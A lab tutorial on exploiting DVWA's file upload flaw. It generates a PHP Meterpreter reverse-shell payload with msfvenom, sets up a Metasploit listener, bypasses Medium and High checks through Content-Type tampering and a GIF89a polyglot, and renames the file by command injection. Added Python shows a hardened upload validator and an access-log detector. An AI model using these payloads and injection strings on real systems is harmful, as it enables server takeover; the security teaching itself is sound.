In this article we will learn about the file upload vulnerability and how it can be used to get a session.
Table of contents:
Practical implementation on DVWA
A file upload vulnerability is a web-based vulnerability that allows an attacker to upload a malicious file directly to the server and then execute it via a web browser. In this article we will try this vulnerability on DVWA at its different security levels and will try to get a session by executing the uploaded file.
Practical implementation on DVWA
We will start with the Low security level. Open DVWA, go to DVWA Security, set the level to Low, then go to the File Upload tab.
As we can see in the image, it asks us to upload a file. So let's create our malicious file using msfvenom.
command used: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.9 lport=4444 -o /root/Desktop/haclabs.php
-p is the payload to use
lhost is the listener address
lport is the listener port
-o specifies the path where the generated file is saved
Now choose the file and click on the Upload button.
We have uploaded the file successfully, and ../../hackable/uploads/haclabs.php is the path where the file is stored. We will use this path to execute our script.
But before that, open Metasploit and set up a handler so that we can catch the session (the handler module and the final exploit command are not listed in the original steps but are needed for msfconsole to start listening).
command used:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.9
set lport 4444
exploit
Change lhost and lport to match the IP address and port number you used when creating the malicious PHP file.
Now it's time to execute the uploaded file.
Copy and paste the path ../../hackable/uploads/haclabs.php into the URL and press Enter.
We have a session, and this is what we want.
Now change the security level to Medium. We will use the same PHP file to upload and to get a session.
After changing to the Medium level, go to the File Upload tab and try to upload the same PHP file.
This time the upload fails: the application responds that it only accepts JPEG or PNG images.
No problem. Open Burp Suite and intercept the request sent when we click on the Upload button.
Now change Content-Type: application/x-php to Content-Type: image/jpeg, click on Forward, and we can see that the file is uploaded. The Medium level only trusts the Content-Type header supplied by the client, which is why this works.
After uploading the file we followed the same steps as before to get a session.
Now change the security level to High. This time we also try to upload the same file, and we can see that an error is displayed.
We then tried the same method as at the Medium level, but we get the same error. No problem: open haclabs.php, add GIF89a; at the very start of the file, and save it as haclabs.jpg. The High level checks the file extension and the image header rather than the Content-Type header, so a GIF header on a .jpg file satisfies it.
Now we upload the file as haclabs.jpg.
Done, we have uploaded the file successfully, and now it's time to execute it. But wait, it's a .jpg file and will not be executed as PHP. So after some thought we found a solution: what if we use OS command injection to rename the file to haclabs.php? To rename the file easily we change the security level back to Low, switch to the Command Injection tab, and use the command 127.0.0.1;cd ..;cd ..;cd hackable;cd uploads;mv haclabs.jpg haclabs.php to rename the file.
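The three DVWA levels above each trust something the client controls: nothing at all (Low), the Content-Type header (Medium), or the extension plus the leading image bytes (High). The following Python is an added example written for this article, not DVWA's own code, that models those three checks and a hardened check beside them, so the bypasses used above can be replayed against each. The magic-byte table, the script-tag pattern and the size limit are assumptions of this example.

```python
import re
import secrets

# Constructed table of image signatures for the types the upload form claims
# to accept (GIF included because the walkthrough relies on a GIF89a header).
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Opening tags that mod_php would interpret if the file were ever executed.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def extension_of(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def sniff_type(data):
    """Return the image type implied by the leading bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def check_low(filename, content_type, data):
    # No validation: any file, any name (the Low level).
    return True


def check_medium(filename, content_type, data):
    # Trusts the client-supplied Content-Type header only (the Medium level).
    return content_type in ("image/jpeg", "image/png")


def check_high(filename, content_type, data):
    # Extension allowlist plus a magic-byte sniff; content after the header
    # is never inspected, so a GIF89a prefix on a .jpg passes (the High level).
    return extension_of(filename) in ALLOWED_EXT and sniff_type(data) is not None


def check_hardened(filename, content_type, data, max_bytes=2 * 1024 * 1024):
    """Return (accepted, reason, stored_name).

    The client's Content-Type and filename are never used to decide how the
    file is stored: the server derives the extension from the sniffed type and
    picks a random name, so a later rename trick has no predictable target.
    """
    if len(data) > max_bytes:
        return False, "too large", None
    kind = sniff_type(data)
    if kind is None:
        return False, "unrecognised magic bytes", None
    if extension_of(filename) not in ALLOWED_EXT:
        return False, "extension not allowed", None
    if PHP_TAG.search(data):
        # A valid image header followed by a script tag is a polyglot, not a photo.
        return False, "embedded script tag", None
    stored = secrets.token_hex(16) + "." + kind
    return True, "ok", stored
```

Even the hardened check is only one layer: the upload directory should also sit outside the web root or have script execution disabled for it (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration), so that a file which slips through is served as bytes rather than run.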
Now the file is renamed successfully and we execute it to get a session. We executed this file using the same method as at the Low and Medium levels.
Done! We have a session now.
So this is how this vulnerability is used to get a session. There are surely more ways to bypass the Medium and High level checks, so if you know another method, mail us the walkthrough at firstname.lastname@example.org
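Both steps of the session above leave a trace in the web server's access log: a request that executes a script from the uploads directory, and a command injection request whose parameter carries shell separators. The following Python is an added example for this article, not part of the original post or of DVWA, that scans Apache combined-format log lines for those two patterns. The log lines, the upload path and the list of script extensions are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)
UPLOAD_DIR = "/hackable/uploads/"          # DVWA's upload directory
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")
# Shell separators and substitution syntax that have no place in an IP field.
# Note: parse_qs splits on "&", so "&&" only shows up here when URL-encoded.
SHELL_META = re.compile(r"[;|`]|\$\(|&&|\|\|")

# Constructed sample: an upload, execution of the uploaded script, the rename
# via command injection from the walkthrough, and a harmless image request.
SAMPLE_LOG = [
    '192.168.43.9 - - [01/Jan/2024:10:00:00 +0000] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.43.9 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/hackable/uploads/haclabs.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.43.9 - - [01/Jan/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/exec/?ip=127.0.0.1%3Bcd+..%3Bcd+hackable%3Bmv+haclabs.jpg+haclabs.php&Submit=Submit HTTP/1.1" 200 1000 "-" "Mozilla/5.0"',
    '192.168.43.9 - - [01/Jan/2024:10:02:00 +0000] "GET /dvwa/hackable/uploads/cat.jpg HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]


def analyse(lines):
    """Return (line_no, rule, client_ip, detail) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue                       # unparsable line: skip rather than crash
        parts = urlsplit(m["target"])
        path = parts.path.lower()
        # Rule 1: a server-side script requested from the upload directory.
        if UPLOAD_DIR in path and path.endswith(SCRIPT_EXT):
            findings.append((n, "script-in-uploads", m["ip"], parts.path))
        # Rule 2: shell metacharacters inside any decoded query parameter.
        for key, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if SHELL_META.search(value):
                    findings.append((n, "shell-metachar", m["ip"], f"{key}={value}"))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

The first rule is the stronger signal: on a server where the upload directory is configured never to execute scripts, any 200 response for such a request means that configuration has been lost. The second rule is noisier and is best applied to parameters, like ip here, whose legitimate values have a narrow format.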